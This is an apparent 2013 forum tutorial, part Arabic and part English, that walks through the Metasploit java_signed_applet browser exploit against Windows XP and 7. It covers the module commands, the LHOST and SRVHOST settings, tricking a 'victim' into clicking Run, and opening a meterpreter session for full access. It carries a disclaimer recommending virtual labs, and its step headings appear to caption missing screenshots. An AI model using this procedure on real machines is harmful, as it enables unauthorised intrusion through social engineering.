كيف تخترق ويندوز أخلاقياً؟ ================ #تنويه يفضل التجريب على بيئة افتراضية فقط. وبهدف فحص الأنظمة لتحسين الأمن ومنع الاختراق الاختراق لنظام ويندوز : XP, Win7SP1 المتطلبات: BackTrack5R 1- Open metasploit ---------------------- After, we choose the exploit to use: Let’s type use exploit/multi/browser/java_signed_applet . Press enter and type “Show options”. 2- Use exploit and show options ------------------------------------ Essential concepts: The SRVHOST and SRVPORT have defined default values 0.0.0.0 and 8080. The SRVHOST is the IP address that the server will work to make the connection URL to be opened by the target browser. SRVHOST is set to 0.0.0.0, the target must be able to connect to this machine using your public IP. 3- Set payload ---------------- The LHOST should be the IP address that the victim is connected. 4- LHOST and exploit ------------------------ When the target open this link on your browser displays a warning in a dialog box . A window will open, and the victim can check the I accept the risk and want to run this application, click Run. 5- Java applet ----------------- بالنهاية Therefore, after the victim open the malicious URL, then click Run, Metasploit will start a meterpreter session to the target machine, and you get full access! You can directly run sessions l to see the active sessions. Example: sessions-i 1, where 1 is the ID of the session. The applet is able to connect to Metasploit. Meterpreter session starts and is ready, as planned, and available options for you to exploit the system.
Posted on: Sat, 26 Oct 2013 06:01:59 +0000
Trending Topics
Recently Viewed Topics
© 2015